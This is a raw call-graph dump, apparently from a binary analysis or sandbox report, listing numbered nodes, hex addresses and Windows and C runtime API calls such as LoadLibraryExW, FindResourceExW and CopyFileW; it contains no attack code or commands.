98319->98271 98319->98273 98319->98275 98319->98276 98319->98278 98319->98298 98319->98301 98319->98304 98319->98305 98319->98306 98319->98307 98319->98309 98319->98310 98319->98312 98319->98313 98319->98314 98319->98315 98319->98316 98319->98317 98319->98318 98381 dde580 98319->98381 98388 dde800 98319->98388 98419 ddf5c0 98319->98419 98438 dd31ce IsDialogMessageW GetClassLongW 98319->98438 98445 e5629f 59 API calls 98319->98445 98446 e39c9f 59 API calls Mailbox 98319->98446 98447 e2d9e3 59 API calls 98319->98447 98448 dd9997 98319->98448 98466 e26665 59 API calls 2 library calls 98319->98466 98467 dd8561 59 API calls 98319->98467 98468 dd843f 59 API calls Mailbox 98319->98468 98320->98178 98321->98182 98322->98176 98323->98176 98325 dda01f 98324->98325 98340 dda04d Mailbox 98324->98340 98326 df0ff6 Mailbox 59 API calls 98325->98326 98326->98340 98327 ddb5d5 98328 dd81a7 59 API calls 98327->98328 98342 dda1b7 98328->98342 98331 df2f80 67 API calls __cinit 98331->98340 98332 df0ff6 59 API calls Mailbox 98332->98340 98333 dd81a7 59 API calls 98333->98340 98335 e1047f 99688 e3a0b5 89 API calls 4 library calls 98335->99688 98337 dd77c7 59 API calls 98337->98340 98339 e1048e 98339->98157 98340->98327 98340->98331 98340->98332 98340->98333 98340->98335 98340->98337 98341 e27405 59 API calls 98340->98341 98340->98342 98343 e10e00 98340->98343 98345 ddb5da 98340->98345 98346 dda6ba 98340->98346 99686 ddca20 331 API calls 2 library calls 98340->99686 99687 ddba60 60 API calls Mailbox 98340->99687 98341->98340 98342->98157 99690 e3a0b5 89 API calls 4 library calls 98343->99690 99691 e3a0b5 89 API calls 4 library calls 98345->99691 99689 e3a0b5 89 API calls 4 library calls 98346->99689 98347->98182 98348->98107 98349->98111 98350->98116 98351->98111 98352->98111 98353->98123 98354->98133 98355->98134 98356->98134 98357->98131 98358->98137 98359->98176 98360->98176 98361->98176 98362->98176 98365 dd862b 98363->98365 98366 dd8652 98365->98366 99692 dd8b13 69 API calls Mailbox 98365->99692 98366->98161 98367->98111 98368->98162 98370 dd81ba 98369->98370 98371 dd81b2 98369->98371 98370->98167 98372 dd80d7 59 API calls 98371->98372 98372->98370 98373->98171 98374->98111 98376 dd7fc2 98375->98376 98378 dd7fbf _memmove 98375->98378 98377 df0ff6 Mailbox 59 API calls 98376->98377 98377->98378 98378->98230 98379->98233 98380->98241 98382 dde59d 98381->98382 98383 dde5b1 98381->98383 98485 dde060 331 API calls 2 library calls 98382->98485 98486 e3a0b5 89 API calls 4 library calls 98383->98486 98385 dde5a8 98385->98319 98387 e13ece 98387->98387 98389 dde835 98388->98389 98390 e13ed3 98389->98390 98393 dde89f 98389->98393 98402 dde8f9 98389->98402 98391 dda000 331 API calls 98390->98391 98392 e13ee8 98391->98392 98416 ddead0 Mailbox 98392->98416 98491 e3a0b5 89 API calls 4 library calls 98392->98491 98395 dd77c7 59 API calls 98393->98395 98393->98402 98394 dd77c7 59 API calls 98394->98402 98397 e13f2e 98395->98397 98492 df2f80 98397->98492 98398 df2f80 __cinit 67 API calls 98398->98402 98400 e13f50 98400->98319 98401 dd8620 69 API calls 98401->98416 98402->98394 98402->98398 98402->98400 98405 ddeaba 98402->98405 98402->98416 98403 dda000 331 API calls 98403->98416 98405->98416 98495 e3a0b5 89 API calls 4 library calls 98405->98495 98406 ddf2f5 98499 e3a0b5 89 API calls 4 library calls 98406->98499 98410 e1424f 98410->98319 98411 dd8ea0 59 API calls 98411->98416 98413 e3a0b5 89 API calls 98413->98416 98416->98401 98416->98403 98416->98406 98416->98411 98416->98413 98418 ddebd8 98416->98418 98487 dd80d7 98416->98487 98496 e27405 59 API calls 98416->98496 98497 e4c8d7 331 API calls 98416->98497 98498 e4b851 331 API calls Mailbox 98416->98498 98500 dd9df0 59 API calls Mailbox 98416->98500 98501 e496db 331 API calls Mailbox 98416->98501 98418->98319 98420 ddf61a 98419->98420 98421 ddf7b0 98419->98421 98423 e14848 98420->98423 98424 ddf626 98420->98424 98422 dd7f41 59 API calls 98421->98422 98427 ddf6ec Mailbox 98422->98427 98680 e4bf80 331 API calls Mailbox 98423->98680 98678 ddf3f0 331 API calls 2 library calls 98424->98678 98580 e3cde5 98427->98580 98660 e4474d 98427->98660 98669 dd4faa 98427->98669 98675 e33e73 98427->98675 98428 e14856 98429 ddf790 98428->98429 98681 e3a0b5 89 API calls 4 library calls 98428->98681 98429->98319 98431 ddf65d 98431->98427 98431->98428 98431->98429 98433 ddf743 98433->98429 98679 dd9df0 59 API calls Mailbox 98433->98679 98438->98319 98439->98250 98440->98255 98441->98319 98442->98254 98443->98254 98444->98254 98445->98319 98446->98319 98447->98319 98449 dd99b1 98448->98449 98457 dd99ab 98448->98457 98450 e0f9fc __i64tow 98449->98450 98451 e0f903 98449->98451 98452 dd99f9 98449->98452 98456 dd99b7 __itow 98449->98456 98459 df0ff6 Mailbox 59 API calls 98451->98459 98464 e0f97b Mailbox _wcscpy 98451->98464 99684 df38d8 83 API calls 3 library calls 98452->99684 98455 df0ff6 Mailbox 59 API calls 98458 dd99d1 98455->98458 98456->98455 98457->98319 98458->98457 98460 dd7f41 59 API calls 98458->98460 98461 e0f948 98459->98461 98460->98457 98462 df0ff6 Mailbox 59 API calls 98461->98462 98463 e0f96e 98462->98463 98463->98464 98465 dd7f41 59 API calls 98463->98465 99685 df38d8 83 API calls 3 library calls 98464->99685 98465->98464 98466->98319 98467->98319 98468->98319 98470 df0ff6 Mailbox 59 API calls 98469->98470 98471 dd77e8 98470->98471 98472 df0ff6 Mailbox 59 API calls 98471->98472 98473 dd77f6 98472->98473 98473->98304 98474->98304 98475->98304 98477 dd7f50 __wsetenvp _memmove 98476->98477 98478 df0ff6 Mailbox 59 API calls 98477->98478 98479 dd7f8e 98478->98479 98479->98304 98480->98304 98481->98304 98482->98304 98483->98304 98484->98304 98485->98385 98486->98387 98488 dd80fa _memmove 98487->98488 98489 dd80e7 98487->98489 98488->98416 98489->98488 98490 df0ff6 Mailbox 59 API calls 98489->98490 98490->98488 98491->98416 98502 df2e84 98492->98502 98494 df2f8b 98494->98402 98495->98416 98496->98416 98497->98416 98498->98416 98499->98410 98500->98416 98501->98416 98503 df2e90 __tzset_nolock 98502->98503 98510 df3457 98503->98510 98509 df2eb7 __tzset_nolock 98509->98494 98527 df9e4b 98510->98527 98512 df2e99 98513 df2ec8 RtlDecodePointer RtlDecodePointer 98512->98513 98514 df2ea5 98513->98514 98515 df2ef5 98513->98515 98524 df2ec2 98514->98524 98515->98514 98573 df89e4 59 API calls __cftof_l 98515->98573 98517 df2f58 RtlEncodePointer RtlEncodePointer 98517->98514 98518 df2f07 98518->98517 98519 df2f2c 98518->98519 98574 df8aa4 61 API calls 2 library calls 98518->98574 98519->98514 98522 df2f46 RtlEncodePointer 98519->98522 98575 df8aa4 61 API calls 2 library calls 98519->98575 98522->98517 98523 df2f40 98523->98514 98523->98522 98576 df3460 98524->98576 98528 df9e6f RtlEnterCriticalSection 98527->98528 98529 df9e5c 98527->98529 98528->98512 98534 df9ed3 98529->98534 98531 df9e62 98531->98528 98558 df32f5 58 API calls 3 library calls 98531->98558 98535 df9edf __tzset_nolock 98534->98535 98536 df9ee8 98535->98536 98537 df9f00 98535->98537 98559 dfa3ab 58 API calls __NMSG_WRITE 98536->98559 98550 df9f21 __tzset_nolock 98537->98550 98562 df8a5d 58 API calls 2 library calls 98537->98562 98540 df9eed 98560 dfa408 58 API calls 6 library calls 98540->98560 98541 df9f15 98544 df9f1c 98541->98544 98545 df9f2b 98541->98545 98543 df9ef4 98561 df32df GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98543->98561 98563 df8d68 58 API calls __getptd_noexit 98544->98563 98548 df9e4b __lock 58 API calls 98545->98548 98551 df9f32 98548->98551 98550->98531 98552 df9f3f 98551->98552 98553 df9f57 98551->98553 98564 dfa06b InitializeCriticalSectionAndSpinCount 98552->98564 98565 df2f95 98553->98565 98556 df9f4b 98571 df9f73 RtlLeaveCriticalSection _doexit 98556->98571 98559->98540 98560->98543 98562->98541 98563->98550 98564->98556 98566 df2f9e RtlFreeHeap 98565->98566 98567 df2fc7 _free 98565->98567 98566->98567 98568 df2fb3 98566->98568 98567->98556 98572 df8d68 58 API calls __getptd_noexit 98568->98572 98570 df2fb9 GetLastError 98570->98567 98571->98550 98572->98570 98573->98518 98574->98519 98575->98523 98579 df9fb5 RtlLeaveCriticalSection 98576->98579 98578 df2ec7 98578->98509 98579->98578 98581 dd77c7 59 API calls 98580->98581 98582 e3ce1a 98581->98582 98583 dd77c7 59 API calls 98582->98583 98584 e3ce23 98583->98584 98585 e3ce37 98584->98585 98878 dd9c9c 59 API calls 98584->98878 98587 dd9997 84 API calls 98585->98587 98588 e3ce54 98587->98588 98589 e3ce76 98588->98589 98590 e3cf55 98588->98590 98595 e3cf85 Mailbox 98588->98595 98591 dd9997 84 API calls 98589->98591 98682 dd4f3d 98590->98682 98593 e3ce82 98591->98593 98596 dd81a7 59 API calls 98593->98596 98595->98433 98601 e3ce8e 98596->98601 98597 dd77c7 59 API calls 98600 e3cfb6 98597->98600 98598 dd4f3d 136 API calls 98599 e3cf81 98598->98599 98599->98595 98599->98597 98602 dd77c7 59 API calls 98600->98602 98603 e3cea2 98601->98603 98604 e3ced4 98601->98604 98605 e3cfbf 98602->98605 98606 dd81a7 59 API calls 98603->98606 98607 dd9997 84 API calls 98604->98607 98608 dd77c7 59 API calls 98605->98608 98609 e3ceb2 98606->98609 98610 e3cee1 98607->98610 98611 e3cfc8 98608->98611 98879 dd7e0b 98609->98879 98613 dd81a7 59 API calls 98610->98613 98614 dd77c7 59 API calls 98611->98614 98616 e3ceed 98613->98616 98617 e3cfd1 98614->98617 98886 e34cd3 GetFileAttributesW 98616->98886 98620 dd9997 84 API calls 98617->98620 98618 dd9997 84 API calls 98622 e3cec8 98618->98622 98621 e3cfde 98620->98621 98706 dd46f9 98621->98706 98625 dd7c8e 59 API calls 98622->98625 98623 e3cef6 98626 e3cf09 98623->98626 98627 dd7b52 59 API calls 98623->98627 98625->98604 98629 dd9997 84 API calls 98626->98629 98635 e3cf0f 98626->98635 98627->98626 98628 e3cff9 98757 dd7b52 98628->98757 98631 e3cf36 98629->98631 98887 e33a2b 75 API calls Mailbox 98631->98887 98634 e3d03c 98637 dd81a7 59 API calls 98634->98637 98635->98595 98636 dd7b52 59 API calls 98638 e3d019 98636->98638 98639 e3d04a 98637->98639 98638->98634 98888 dd7d2c 98638->98888 98760 dd7c8e 98639->98760 98643 dd7c8e 59 API calls 98645 e3d066 98643->98645 98644 e3d02e 98646 dd7d2c 59 API calls 98644->98646 98647 dd7c8e 59 API calls 98645->98647 98646->98634 98648 e3d074 98647->98648 98649 dd9997 84 API calls 98648->98649 98650 e3d080 98649->98650 98769 e342ad 98650->98769 98652 e3d091 98653 e33e73 3 API calls 98652->98653 98654 e3d09b 98653->98654 98655 dd9997 84 API calls 98654->98655 98658 e3d0cc 98654->98658 98656 e3d0b9 98655->98656 98823 e393df 98656->98823 98659 dd4faa 84 API calls 98658->98659 98659->98595 98661 dd9997 84 API calls 98660->98661 98662 e44787 98661->98662 99635 dd63a0 98662->99635 98664 e44797 98665 e447bc 98664->98665 98666 dda000 331 API calls 98664->98666 98668 e447c0 98665->98668 99660 dd9bf8 59 API calls Mailbox 98665->99660 98666->98665 98668->98433 98670 dd4fb4 98669->98670 98672 dd4fbb 98669->98672 98671 df55d6 __fcloseall 83 API calls 98670->98671 98671->98672 98673 dd4fdb FreeLibrary 98672->98673 98674 dd4fca 98672->98674 98673->98674 98674->98433 99680 e34696 GetFileAttributesW 98675->99680 98678->98431 98679->98433 98680->98428 98681->98429 98897 dd4d13 98682->98897 98687 dd4f68 LoadLibraryExW 98907 dd4cc8 98687->98907 98688 e0dd0f 98689 dd4faa 84 API calls 98688->98689 98691 e0dd16 98689->98691 98693 dd4cc8 3 API calls 98691->98693 98695 e0dd1e 98693->98695 98933 dd506b 98695->98933 98696 dd4f8f 98696->98695 98697 dd4f9b 98696->98697 98699 dd4faa 84 API calls 98697->98699 98701 dd4fa0 98699->98701 98701->98598 98701->98599 98703 e0dd45 98941 dd5027 98703->98941 98707 dd77c7 59 API calls 98706->98707 98708 dd470f 98707->98708 98709 dd77c7 59 API calls 98708->98709 98710 dd4717 98709->98710 98711 dd77c7 59 API calls 98710->98711 98712 dd471f 98711->98712 98713 dd77c7 59 API calls 98712->98713 98714 dd4727 98713->98714 98715 dd475b 98714->98715 98716 e0d8fb 98714->98716 98717 dd79ab 59 API calls 98715->98717 98718 dd81a7 59 API calls 98716->98718 98719 dd4769 98717->98719 98720 e0d904 98718->98720 99241 dd7e8c 98719->99241 99245 dd7eec 98720->99245 98723 dd4773 98724 dd79ab 59 API calls 98723->98724 98725 dd479e 98723->98725 98727 dd4794 98724->98727 98728 dd47bd 98725->98728 98729 e0d924 98725->98729 98743 dd47de 98725->98743 98731 dd7e8c 59 API calls 98727->98731 98733 dd7b52 59 API calls 98728->98733 98732 e0d9f4 98729->98732 98740 e0d9dd 98729->98740 98751 e0d95b 98729->98751 98730 dd47ef 98735 dd4801 98730->98735 98737 dd81a7 59 API calls 98730->98737 98731->98725 98736 dd7d2c 59 API calls 98732->98736 98734 dd47c7 98733->98734 98738 dd79ab 59 API calls 98734->98738 98734->98743 98739 dd81a7 59 API calls 98735->98739 98741 dd4811 98735->98741 98752 e0d9b1 98736->98752 98737->98735 98738->98743 98739->98741 98740->98732 98748 e0d9c8 98740->98748 98742 dd4818 98741->98742 98744 dd81a7 59 API calls 98741->98744 98745 dd81a7 59 API calls 98742->98745 98754 dd481f Mailbox 98742->98754 99228 dd79ab 98743->99228 98744->98742 98745->98754 98746 dd7b52 59 API calls 98746->98752 98747 e0d9b9 98749 dd7d2c 59 API calls 98747->98749 98750 dd7d2c 59 API calls 98748->98750 98749->98752 98750->98752 98751->98747 98755 e0d9a4 98751->98755 98752->98743 98752->98746 99249 dd7a84 59 API calls 2 library calls 98752->99249 98754->98628 98756 dd7d2c 59 API calls 98755->98756 98756->98752 98758 dd7faf 59 API calls 98757->98758 98759 dd7b5d 98758->98759 98759->98634 98759->98636 98761 e0f094 98760->98761 98762 dd7ca0 98760->98762 99260 e28123 59 API calls _memmove 98761->99260 99254 dd7bb1 98762->99254 98765 dd7cac 98765->98643 98766 e0f09e 98767 dd81a7 59 API calls 98766->98767 98768 e0f0a6 Mailbox 98767->98768 98770 e342c9 98769->98770 98771 e342ce 98770->98771 98772 e342dc 98770->98772 98774 dd81a7 59 API calls 98771->98774 98773 dd77c7 59 API calls 98772->98773 98775 e342e4 98773->98775 98776 e342d7 Mailbox 98774->98776 98777 dd77c7 59 API calls 98775->98777 98776->98652 98778 e342ec 98777->98778 98779 dd77c7 59 API calls 98778->98779 98780 e342f7 98779->98780 98781 dd77c7 59 API calls 98780->98781 98782 e342ff 98781->98782 98783 dd77c7 59 API calls 98782->98783 98784 e34307 98783->98784 98785 dd77c7 59 API calls 98784->98785 98786 e3430f 98785->98786 98787 dd77c7 59 API calls 98786->98787 98788 e34317 98787->98788 98789 dd77c7 59 API calls 98788->98789 98790 e3431f 98789->98790 98791 dd46f9 59 API calls 98790->98791 98792 e34336 98791->98792 98793 dd46f9 59 API calls 98792->98793 98794 e3434f 98793->98794 98795 dd7b52 59 API calls 98794->98795 98796 e3435b 98795->98796 98797 e3436e 98796->98797 98798 dd7e8c 59 API calls 98796->98798 98799 dd7b52 59 API calls 98797->98799 98798->98797 98800 e34377 98799->98800 98801 e34387 98800->98801 98802 dd7e8c 59 API calls 98800->98802 98803 dd81a7 59 API calls 98801->98803 98802->98801 98804 e34393 98803->98804 98805 dd7c8e 59 API calls 98804->98805 98806 e3439f 98805->98806 99261 e3445f 59 API calls 98806->99261 98808 e343ae 99262 e3445f 59 API calls 98808->99262 98810 e343c1 98811 dd7b52 59 API calls 98810->98811 98812 e343cb 98811->98812 98813 e343e2 98812->98813 98814 e343d0 98812->98814 98816 dd7b52 59 API calls 98813->98816 98815 dd7e0b 59 API calls 98814->98815 98817 e343dd 98815->98817 98818 e343eb 98816->98818 98821 dd7c8e 59 API calls 98817->98821 98819 e34409 98818->98819 98820 dd7e0b 59 API calls 98818->98820 98822 dd7c8e 59 API calls 98819->98822 98820->98817 98821->98819 98822->98776 98824 e393ec __ftell_nolock 98823->98824 98825 df0ff6 Mailbox 59 API calls 98824->98825 98826 e39449 98825->98826 98827 dd538e 59 API calls 98826->98827 98828 e39453 98827->98828 98829 e391e9 GetSystemTimeAsFileTime 98828->98829 98830 e3945e 98829->98830 98831 dd5045 85 API calls 98830->98831 98832 e39471 _wcscmp 98831->98832 98833 e39542 98832->98833 98834 e39495 98832->98834 98835 e399be 96 API calls 98833->98835 99293 e399be 98834->99293 98851 e3950e _wcscat 98835->98851 98839 dd506b 74 API calls 98841 e39567 98839->98841 98840 e3954b 98840->98658 98842 dd506b 74 API calls 98841->98842 98844 e39577 98842->98844 98843 e394c3 _wcscat _wcscpy 99300 df432e 58 API calls __wsplitpath_helper 98843->99300 98845 dd506b 74 API calls 98844->98845 98847 e39592 98845->98847 98848 dd506b 74 API calls 98847->98848 98849 e395a2 98848->98849 98850 dd506b 74 API calls 98849->98850 98852 e395bd 98850->98852 98851->98839 98851->98840 98853 dd506b 74 API calls 98852->98853 98854 e395cd 98853->98854 98855 dd506b 74 API calls 98854->98855 98856 e395dd 98855->98856 98857 dd506b 74 API calls 98856->98857 98858 e395ed 98857->98858 99263 e39b6d GetTempPathW GetTempFileNameW 98858->99263 98860 e395f9 98861 df548b 115 API calls 98860->98861 98872 e3960a 98861->98872 98862 e396c4 99277 df55d6 98862->99277 98864 e396cf 98866 e396d5 DeleteFileW 98864->98866 98867 e396e9 98864->98867 98865 dd506b 74 API calls 98865->98872 98866->98840 98868 e3978f CopyFileW 98867->98868 98873 e396f3 _wcsncpy 98867->98873 98869 e397b7 DeleteFileW 98868->98869 98870 e397a5 DeleteFileW 98868->98870 99290 e39b2c CreateFileW 98869->99290 98870->98840 98872->98840 98872->98862 98872->98865 99264 df4a93 98872->99264 99301 e38d90 98873->99301 98877 e3977e DeleteFileW 98877->98840 98878->98585 98880 dd7e1f 98879->98880 98881 e0f173 98879->98881 99629 dd7db0 98880->99629 98883 dd8189 59 API calls 98881->98883 98885 e0f17e __wsetenvp _memmove 98883->98885 98884 dd7e2a 98884->98618 98886->98623 98887->98635 98889 dd7d38 __wsetenvp 98888->98889 98890 dd7da5 98888->98890 98892 dd7d4e 98889->98892 98893 dd7d73 98889->98893 98891 dd7e8c 59 API calls 98890->98891 98896 dd7d56 _memmove 98891->98896 99634 dd8087 59 API calls Mailbox 98892->99634 98895 dd8189 59 API calls 98893->98895 98895->98896 98896->98644 98946 dd4d61 98897->98946 98900 dd4d3a 98901 dd4d4a FreeLibrary 98900->98901 98902 dd4d53 98900->98902 98901->98902 98904 df548b 98902->98904 98903 dd4d61 2 API calls 98903->98900 98950 df54a0 98904->98950 98906 dd4f5c 98906->98687 98906->98688 99031 dd4d94 98907->99031 98910 dd4d94 2 API calls 98913 dd4ced 98910->98913 98911 dd4cff FreeLibrary 98912 dd4d08 98911->98912 98914 dd4dd0 98912->98914 98913->98911 98913->98912 98915 df0ff6 Mailbox 59 API calls 98914->98915 98916 dd4de5 98915->98916 99035 dd538e 98916->99035 98918 dd4df1 _memmove 98920 dd4ee9 98918->98920 98921 dd4f21 98918->98921 98924 dd4e2c 98918->98924 98919 dd5027 69 API calls 98929 dd4e35 98919->98929 99038 dd4fe9 CreateStreamOnHGlobal 98920->99038 99049 e39ba5 95 API calls 98921->99049 98924->98919 98925 dd506b 74 API calls 98925->98929 98927 dd4ec9 98927->98696 98928 e0dcd0 98930 dd5045 85 API calls 98928->98930 98929->98925 98929->98927 98929->98928 99044 dd5045 98929->99044 98931 e0dce4 98930->98931 98932 dd506b 74 API calls 98931->98932 98932->98927 98934 dd507d 98933->98934 98935 e0ddf6 98933->98935 99073 df5812 98934->99073 98938 e39393 99205 e391e9 98938->99205 98940 e393a9 98940->98703 98942 e0ddb9 98941->98942 98943 dd5036 98941->98943 99210 df5e90 98943->99210 98945 dd503e 98947 dd4d2e 98946->98947 98948 dd4d6a LoadLibraryA 98946->98948 98947->98900 98947->98903 98948->98947 98949 dd4d7b GetProcAddress 98948->98949 98949->98947 98953 df54ac __tzset_nolock 98950->98953 98951 df54bf 98999 df8d68 58 API calls __getptd_noexit 98951->98999 98953->98951 98955 df54f0 98953->98955 98954 df54c4 99000 df8ff6 9 API calls __cftof_l 98954->99000 98969 e00738 98955->98969 98958 df54f5 98959 df54fe 98958->98959 98960 df550b 98958->98960 99001 df8d68 58 API calls __getptd_noexit 98959->99001 98962 df5535 98960->98962 98963 df5515 98960->98963 98984 e00857 98962->98984 99002 df8d68 58 API calls __getptd_noexit 98963->99002 98964 df54cf __tzset_nolock @_EH4_CallFilterFunc@8 98964->98906 98970 e00744 __tzset_nolock 98969->98970 98971 df9e4b __lock 58 API calls 98970->98971 98972 e00752 98971->98972 98973 e007cd 98972->98973 98978 df9ed3 __mtinitlocknum 58 API calls 98972->98978 98982 e007c6 98972->98982 99007 df6e8d 59 API calls __lock 98972->99007 99008 df6ef7 RtlLeaveCriticalSection RtlLeaveCriticalSection _doexit 98972->99008 99009 df8a5d 58 API calls 2 library calls 98973->99009 98976 e007d4 98976->98982 99010 dfa06b InitializeCriticalSectionAndSpinCount 98976->99010 98978->98972 98980 e00843 __tzset_nolock 98980->98958 98981 e007fa RtlEnterCriticalSection 98981->98982 99004 e0084e 98982->99004 98992 e00877 __wopenfile 98984->98992 98985 e00891 99015 df8d68 58 API calls __getptd_noexit 98985->99015 98987 e00896 99016 df8ff6 9 API calls __cftof_l 98987->99016 98989 e00a4c 98989->98985 98991 e00aaf 98989->98991 98990 df5540 99003 df5562 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 98990->99003 99012 e087f1 98991->99012 98992->98985 98992->98989 99017 df3a0b 60 API calls 2 library calls 98992->99017 98995 e00a45 98995->98989 99018 df3a0b 60 API calls 2 library calls 98995->99018 98997 e00a64 98997->98989 99019 df3a0b 60 API calls 2 library calls 98997->99019 98999->98954 99000->98964 99001->98964 99002->98964 99003->98964 99011 df9fb5 RtlLeaveCriticalSection 99004->99011 99006 e00855 99006->98980 99007->98972 99008->98972 99009->98976 99010->98981 99011->99006 99020 e07fd5 99012->99020 99014 e0880a 99014->98990 99015->98987 99016->98990 99017->98995 99018->98997 99019->98989 99022 e07fe1 __tzset_nolock 99020->99022 99021 e07ff7 99023 df8d68 __cftof_l 58 API calls 99021->99023 99022->99021 99024 e0802d 99022->99024 99025 e07ffc 99023->99025 99026 e0809e __wsopen_nolock 109 API calls 99024->99026 99027 df8ff6 __cftof_l 9 API calls 99025->99027 99028 e08049 99026->99028 99030 e08006 __tzset_nolock 99027->99030 99029 e08072 __wsopen_helper RtlLeaveCriticalSection 99028->99029 99029->99030 99030->99014 99032 dd4ce1 99031->99032 99033 dd4d9d LoadLibraryA 99031->99033 99032->98910 99032->98913 99033->99032 99034 dd4dae GetProcAddress 99033->99034 99034->99032 99036 df0ff6 Mailbox 59 API calls 99035->99036 99037 dd53a0 99036->99037 99037->98918 99039 dd5003 FindResourceExW 99038->99039 99043 dd5020 99038->99043 99040 e0dd5c LoadResource 99039->99040 99039->99043 99041 e0dd71 SizeofResource 99040->99041 99040->99043 99042 e0dd85 LockResource 99041->99042 99041->99043 99042->99043 99043->98924 99045 dd5054 99044->99045 99048 e0ddd4 99044->99048 99050 df5a7d 99045->99050 99047 dd5062 99047->98929 99049->98924 99051 df5a89 __tzset_nolock 99050->99051 99052 df5a9b 99051->99052 99054 df5ac1 99051->99054 99063 df8d68 58 API calls __getptd_noexit 99052->99063 99065 df6e4e 99054->99065 99055 df5aa0 99064 df8ff6 9 API calls __cftof_l 99055->99064 99060 df5ad6 99072 df5af8 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99060->99072 99062 df5aab __tzset_nolock 99062->99047 99063->99055 99064->99062 99066 df6e5e 99065->99066 99067 df6e80 RtlEnterCriticalSection 99065->99067 99066->99067 99069 df6e66 99066->99069 99068 df5ac7 99067->99068 99071 df59ee 83 API calls 5 library calls 99068->99071 99070 df9e4b __lock 58 API calls 99069->99070 99070->99068 99071->99060 99072->99062 99076 df582d 99073->99076 99075 dd508e 99075->98938 99077 df5839 __tzset_nolock 99076->99077 99078 df587c 99077->99078 99080 df584f _memset 99077->99080 99088 df5874 __tzset_nolock 99077->99088 99079 df6e4e __lock_file 59 API calls 99078->99079 99081 df5882 99079->99081 99103 df8d68 58 API calls __getptd_noexit 99080->99103 99089 df564d 99081->99089 99084 df5869 99104 df8ff6 9 API calls __cftof_l 99084->99104 99088->99075 99093 df5668 _memset 99089->99093 99095 df5683 99089->99095 99090 df5673 99201 df8d68 58 API calls __getptd_noexit 99090->99201 99092 df5678 99202 df8ff6 9 API calls __cftof_l 99092->99202 99093->99090 99093->99095 99100 df56c3 99093->99100 99105 df58b6 RtlLeaveCriticalSection RtlLeaveCriticalSection _fprintf 99095->99105 99097 df57d4 _memset 99204 df8d68 58 API calls __getptd_noexit 99097->99204 99100->99095 99100->99097 99106 df4916 99100->99106 99113 e010ab 99100->99113 99181 e00df7 99100->99181 99203 e00f18 58 API calls 3 library calls 99100->99203 99103->99084 99104->99088 99105->99088 99107 df4935 99106->99107 99108 df4920 99106->99108 99107->99100 99109 df8d68 __cftof_l 58 API calls 99108->99109 99110 df4925 99109->99110 99111 df8ff6 __cftof_l 9 API calls 99110->99111 99112 df4930 99111->99112 99112->99100 99114 e010e3 99113->99114 99115 e010cc 99113->99115 99117 e0181b 99114->99117 99122 e0111d 99114->99122 99116 df8d34 __write 58 API calls 99115->99116 99118 e010d1 99116->99118 99119 df8d34 __write 58 API calls 99117->99119 99121 df8d68 __cftof_l 58 API calls 99118->99121 99120 e01820 99119->99120 99123 df8d68 __cftof_l 58 API calls 99120->99123 99161 e010d8 99121->99161 99124 e01125 99122->99124 99130 e0113c 99122->99130 99125 e01131 99123->99125 99126 df8d34 __write 58 API calls 99124->99126 99128 df8ff6 __cftof_l 9 API calls 99125->99128 99127 e0112a 99126->99127 99131 df8d68 __cftof_l 58 API calls 99127->99131 99128->99161 99129 e01151 99132 df8d34 __write 58 API calls 99129->99132 99130->99129 99133 e0116b 99130->99133 99134 e01189 99130->99134 99130->99161 99131->99125 99132->99127 99133->99129 99138 e01176 99133->99138 99135 df8a5d __malloc_crt 58 API calls 99134->99135 99136 e01199 99135->99136 99139 e011a1 99136->99139 99140 e011bc 99136->99140 99137 e05ebb __flswbuf 58 API calls 99141 e0128a 99137->99141 99138->99137 99142 df8d68 __cftof_l 58 API calls 99139->99142 99144 e01b11 __lseeki64_nolock 60 API calls 99140->99144 99143 e01303 ReadFile 99141->99143 99148 e012a0 GetConsoleMode 99141->99148 99145 e011a6 99142->99145 99146 e017e3 GetLastError 99143->99146 99147 e01325 99143->99147 99144->99138 99149 df8d34 __write 58 API calls 99145->99149 99150 e017f0 99146->99150 99151 e012e3 99146->99151 99147->99146 99155 e012f5 99147->99155 99152 e01300 99148->99152 99153 e012b4 99148->99153 99149->99161 99154 df8d68 __cftof_l 58 API calls 99150->99154 99159 df8d47 __dosmaperr 58 API calls 99151->99159 99163 e012e9 99151->99163 99152->99143 99153->99152 99156 e012ba ReadConsoleW 99153->99156 99157 e017f5 99154->99157 99155->99163 99164 e0135a 99155->99164 99170 e015c7 99155->99170 99156->99155 99158 e012dd GetLastError 99156->99158 99160 df8d34 __write 58 API calls 99157->99160 99158->99151 99159->99163 99160->99163 99161->99100 99162 df2f95 _free 58 API calls 99162->99161 99163->99161 99163->99162 99166 e013c6 ReadFile 99164->99166 99172 e01447 99164->99172 99167 e013e7 GetLastError 99166->99167 99177 e013f1 99166->99177 99167->99177 99168 e01504 99176 e01b11 __lseeki64_nolock 60 API calls 99168->99176 99178 e014b4 MultiByteToWideChar 99168->99178 99169 e014f4 99173 df8d68 __cftof_l 58 API calls 99169->99173 99170->99163 99171 e016cd ReadFile 99170->99171 99174 e016f0 GetLastError 99171->99174 99175 e016fe 99171->99175 99172->99163 99172->99168 99172->99169 99172->99178 99173->99163 99174->99175 99175->99170 99180 e01b11 __lseeki64_nolock 60 API calls 99175->99180 99176->99178 99177->99164 99179 e01b11 __lseeki64_nolock 60 API calls 99177->99179 99178->99158 99178->99163 99179->99177 99180->99175 99182 e00e02 99181->99182 99185 e00e17 99181->99185 99183 df8d68 __cftof_l 58 API calls 99182->99183 99184 e00e07 99183->99184 99186 df8ff6 __cftof_l 9 API calls 99184->99186 99187 e00e4c 99185->99187 99188 e06234 __getbuf 58 API calls 99185->99188 99193 e00e12 99185->99193 99186->99193 99189 df4916 __flswbuf 58 API calls 99187->99189 99188->99187 99190 e00e60 99189->99190 99191 e00f97 __read 72 API calls 99190->99191 99192 e00e67 99191->99192 99192->99193 99194 df4916 __flswbuf 58 API calls 99192->99194 99193->99100 99195 e00e8a 99194->99195 99195->99193 99196 df4916 __flswbuf 58 API calls 99195->99196 99197 e00e96 99196->99197 99197->99193 99198 df4916 __flswbuf 58 API calls 99197->99198 99199 e00ea3 99198->99199 99200 df4916 __flswbuf 58 API calls 99199->99200 99200->99193 99201->99092 99202->99095 99203->99100 99204->99092 99208 df543a GetSystemTimeAsFileTime 99205->99208 99207 e391f8 99207->98940 99209 df5468 __aulldiv 99208->99209 99209->99207 99211 df5e9c __tzset_nolock 99210->99211 99212 df5eae 99211->99212 99213 df5ec3 99211->99213 99224 df8d68 58 API calls __getptd_noexit 99212->99224 99214 df6e4e __lock_file 59 API calls 99213->99214 99217 df5ec9 99214->99217 99216 